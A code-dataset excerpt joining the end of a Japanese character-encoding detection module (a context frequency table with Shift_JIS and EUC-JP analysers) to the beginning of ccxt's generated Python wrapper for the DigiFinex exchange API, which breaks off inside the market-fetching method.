(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4),
(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4),
(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1),
(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0),
(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3),
(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0),
(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3),
(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3),
(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5),
(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4),
(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5),
(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3),
(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3),
(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3),
(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3),
(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4),
(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4),
(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2),
(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3),
(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3),
(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3),
(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3),
(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4),
(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3),
(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4),
(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3),
(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3),
(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4),
(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4),
(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3),
(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4),
(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4),
(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3),
(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4),
(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4),
(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4),
(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3),
(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2),
(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2),
(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3),
(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3),
(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5),
(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3),
(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4),
(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4),
(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1),
(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2),
(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3),
(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1),
)
class JapaneseContextAnalysis:
def __init__(self):
self.reset()
def reset(self):
self._mTotalRel = 0 # total sequence received
# category counters, each interger counts sequence in its category
self._mRelSample = [0] * NUM_OF_CATEGORY
# if last byte in current buffer is not the last byte of a character,
# we need to know how many bytes to skip in next buffer
self._mNeedToSkipCharNum = 0
self._mLastCharOrder = -1 # The order of previous char
# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
def feed(self, aBuf, aLen):
if self._mDone:
return
# The buffer we got is byte oriented, and a character may span in more than one
# buffers. In case the last one or two byte in last buffer is not
# complete, we record how many byte needed to complete that character
# and skip these bytes here. We can choose to record those bytes as
# well and analyse the character once it is complete, but since a
# character will not make much difference, by simply skipping
# this character will simply our logic and improve performance.
i = self._mNeedToSkipCharNum
while i < aLen:
order, charLen = self.get_order(aBuf[i:i + 2])
i += charLen
if i > aLen:
self._mNeedToSkipCharNum = i - aLen
self._mLastCharOrder = -1
else:
if (order != -1) and (self._mLastCharOrder != -1):
self._mTotalRel += 1
if self._mTotalRel > MAX_REL_THRESHOLD:
self._mDone = True
break
self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1
self._mLastCharOrder = order
def got_enough_data(self):
return self._mTotalRel > ENOUGH_REL_THRESHOLD
def get_confidence(self):
# This is just one way to calculate confidence. It works well for me.
if self._mTotalRel > MINIMUM_DATA_THRESHOLD:
return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel
else:
return DONT_KNOW
def get_order(self, aBuf):
return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
def __init__(self):
self.charset_name = "SHIFT_JIS"
def get_charset_name(self):
return self.charset_name
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
first_char = wrap_ord(aBuf[0])
if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)):
charLen = 2
if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
self.charset_name = "CP932"
else:
charLen = 1
# return its order if it is hiragana
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 202) and (0x9F <= second_char <= 0xF1):
return second_char - 0x9F, charLen
return -1, charLen
class EUCJPContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
first_char = wrap_ord(aBuf[0])
if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):
charLen = 2
elif first_char == 0x8F:
charLen = 3
else:
charLen = 1
# return its order if it is hiragana
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):
return second_char - 0xA1, charLen
return -1, charLen
# flake8: noqa
| bsd-3-clause |
ccxt/ccxt | python/ccxt/digifinex.py | 1 | 55044 | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import BadResponse
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NetworkError
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import InvalidNonce
from ccxt.base.precise import Precise
class digifinex(Exchange):
def describe(self):
return self.deep_extend(super(digifinex, self).describe(), {
'id': 'digifinex',
'name': 'DigiFinex',
'countries': ['SG'],
'version': 'v3',
'rateLimit': 900, # 300 for posts
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'fetchBalance': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchStatus': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'4h': '240',
'12h': '720',
'1d': '1D',
'1w': '1W',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443315-01283a00-c5fe-11ea-8628-c2a0feaf07ac.jpg',
'api': 'https://openapi.digifinex.com',
'www': 'https://www.digifinex.com',
'doc': [
'https://docs.digifinex.com',
],
'fees': 'https://digifinex.zendesk.com/hc/en-us/articles/360000328422-Fee-Structure-on-DigiFinex',
'referral': 'https://www.digifinex.com/en-ww/from/DhOzBg?channelCode=ljaUPp',
},
'api': {
'public': {
'get': [
'{market}/symbols',
'kline',
'margin/currencies',
'margin/symbols',
'markets',
'order_book',
'ping',
'spot/symbols',
'time',
'trades',
'trades/symbols',
'ticker',
'currencies', # todo add fetchCurrencies
],
},
'private': {
'get': [
'{market}/financelog',
'{market}/mytrades',
'{market}/order',
'{market}/order/detail', # todo add fetchOrder
'{market}/order/current',
'{market}/order/history',
'margin/assets',
'margin/financelog',
'margin/mytrades',
'margin/order',
'margin/order/current',
'margin/order/history',
'margin/positions',
'otc/financelog',
'spot/assets',
'spot/financelog',
'spot/mytrades',
'spot/order',
'spot/order/current',
'spot/order/history',
'deposit/address', # todo add fetchDepositAddress
'deposit/history', # todo add fetchDeposits
'withdraw/history', # todo add fetchWithdrawals
],
'post': [
'{market}/order/cancel',
'{market}/order/new',
'{market}/order/batch_new',
'margin/order/cancel',
'margin/order/new',
'margin/position/close',
'spot/order/cancel',
'spot/order/new',
'transfer',
'withdraw/new', # todo add withdraw()
'withdraw/cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.002,
'taker': 0.002,
},
},
'exceptions': {
'exact': {
'10001': [BadRequest, "Wrong request method, please check it's a GET ot POST request"],
'10002': [AuthenticationError, 'Invalid ApiKey'],
'10003': [AuthenticationError, "Sign doesn't match"],
'10004': [BadRequest, 'Illegal request parameters'],
'10005': [DDoSProtection, 'Request frequency exceeds the limit'],
'10006': [PermissionDenied, 'Unauthorized to execute self request'],
'10007': [PermissionDenied, 'IP address Unauthorized'],
'10008': [InvalidNonce, 'Timestamp for self request is invalid, timestamp must within 1 minute'],
'10009': [NetworkError, 'Unexist endpoint, please check endpoint URL'],
'10011': [AccountSuspended, 'ApiKey expired. Please go to client side to re-create an ApiKey'],
'20001': [PermissionDenied, 'Trade is not open for self trading pair'],
'20002': [PermissionDenied, 'Trade of self trading pair is suspended'],
'20003': [InvalidOrder, 'Invalid price or amount'],
'20007': [InvalidOrder, 'Price precision error'],
'20008': [InvalidOrder, 'Amount precision error'],
'20009': [InvalidOrder, 'Amount is less than the minimum requirement'],
'20010': [InvalidOrder, 'Cash Amount is less than the minimum requirement'],
'20011': [InsufficientFunds, 'Insufficient balance'],
'20012': [BadRequest, 'Invalid trade type, valid value: buy/sell)'],
'20013': [InvalidOrder, 'No order info found'],
'20014': [BadRequest, 'Invalid date, Valid format: 2018-07-25)'],
'20015': [BadRequest, 'Date exceeds the limit'],
'20018': [PermissionDenied, 'Your trading rights have been banned by the system'],
'20019': [BadRequest, 'Wrong trading pair symbol. Correct format:"usdt_btc". Quote asset is in the front'],
'20020': [DDoSProtection, "You have violated the API operation trading rules and temporarily forbid trading. At present, we have certain restrictions on the user's transaction rate and withdrawal rate."],
'50000': [ExchangeError, 'Exception error'],
'20021': [BadRequest, 'Invalid currency'],
'20022': [BadRequest, 'The ending timestamp must be larger than the starting timestamp'],
'20023': [BadRequest, 'Invalid transfer type'],
'20024': [BadRequest, 'Invalid amount'],
'20025': [BadRequest, 'This currency is not transferable at the moment'],
'20026': [InsufficientFunds, 'Transfer amount exceed your balance'],
'20027': [PermissionDenied, 'Abnormal account status'],
'20028': [PermissionDenied, 'Blacklist for transfer'],
'20029': [PermissionDenied, 'Transfer amount exceed your daily limit'],
'20030': [BadRequest, 'You have no position on self trading pair'],
'20032': [PermissionDenied, 'Withdrawal limited'],
'20033': [BadRequest, 'Wrong Withdrawal ID'],
'20034': [PermissionDenied, 'Withdrawal service of self crypto has been closed'],
'20035': [PermissionDenied, 'Withdrawal limit'],
'20036': [ExchangeError, 'Withdrawal cancellation failed'],
'20037': [InvalidAddress, 'The withdrawal address, Tag or chain type is not included in the withdrawal management list'],
'20038': [InvalidAddress, 'The withdrawal address is not on the white list'],
'20039': [ExchangeError, "Can't be canceled in current status"],
'20040': [RateLimitExceeded, 'Withdraw too frequently; limitation: 3 times a minute, 100 times a day'],
'20041': [PermissionDenied, 'Beyond the daily withdrawal limit'],
'20042': [BadSymbol, 'Current trading pair does not support API trading'],
},
'broad': {
},
},
'options': {
'defaultType': 'spot',
'types': ['spot', 'margin', 'otc'],
},
'commonCurrencies': {
'BHT': 'Black House Test',
'EPS': 'Epanus',
'MBN': 'Mobilian Coin',
'TEL': 'TEL666',
},
})
def fetch_currencies(self, params={}):
response = self.publicGetCurrencies(params)
#
# {
# "data":[
# {
# "deposit_status":1,
# "min_deposit_amount":10,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":10,
# "min_withdraw_fee":5,
# "currency":"USDT",
# "withdraw_status":0,
# "chain":"OMNI"
# },
# {
# "deposit_status":1,
# "min_deposit_amount":10,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":10,
# "min_withdraw_fee":3,
# "currency":"USDT",
# "withdraw_status":1,
# "chain":"ERC20"
# },
# {
# "deposit_status":0,
# "min_deposit_amount":0,
# "withdraw_fee_rate":0,
# "min_withdraw_amount":0,
# "min_withdraw_fee":0,
# "currency":"DGF13",
# "withdraw_status":0,
# "chain":""
# },
# ],
# "code":200
# }
#
data = self.safe_value(response, 'data', [])
result = {}
for i in range(0, len(data)):
currency = data[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
depositStatus = self.safe_value(currency, 'deposit_status', 1)
withdrawStatus = self.safe_value(currency, 'withdraw_status', 1)
active = depositStatus and withdrawStatus
fee = self.safe_number(currency, 'withdraw_fee_rate')
if code in result:
if isinstance(result[code]['info'], list):
result[code]['info'].append(currency)
else:
result[code]['info'] = [result[code]['info'], currency]
else:
result[code] = {
'id': id,
'code': code,
'info': currency,
'type': None,
'name': None,
'active': active,
'fee': fee,
'precision': 8, # todo fix hardcoded value
'limits': {
'amount': {
'min': None,
'max': None,
},
'withdraw': {
'min': self.safe_number(currency, 'min_withdraw_amount'),
'max': None,
},
},
}
return result
def fetch_markets(self, params={}):
options = self.safe_value(self.options, 'fetchMarkets', {})
method = self.safe_string(options, 'method', 'fetch_markets_v2')
return getattr(self, method)(params)
def fetch_markets_v2(self, params={}):
response = self.publicGetTradesSymbols(params)
#
# {
# "symbol_list":[
# {
# "order_types":["LIMIT","MARKET"],
# "quote_asset":"USDT",
# "minimum_value":2,
# "amount_precision":4,
# "status":"TRADING",
# "minimum_amount":0.0001,
# "symbol":"BTC_USDT",
# "is_allow":1,
# "zone":"MAIN",
# "base_asset":"BTC",
# "price_precision":2
# }
# ],
# "code":0
# }
#
markets = self.safe_value(response, 'symbol_list', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'symbol')
baseId = self.safe_string(market, 'base_asset')
quoteId = self.safe_string(market, 'quote_asset')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'amount_precision'),
'price': self.safe_integer(market, 'price_precision'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'minimum_amount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'minimum_value'),
'max': None,
},
}
#
# The status is documented in the exchange API docs as follows:
# TRADING, HALT(delisted), BREAK(trading paused)
# https://docs.digifinex.vip/en-ww/v3/#/public/spot/symbols
# However, all spot markets actually have status == 'HALT'
# despite that they appear to be active on the exchange website.
# Apparently, we can't trust self status.
# status = self.safe_string(market, 'status')
# active = (status == 'TRADING')
#
isAllowed = self.safe_integer(market, 'is_allow', 1)
active = True if isAllowed else False
type = 'spot'
spot = (type == 'spot')
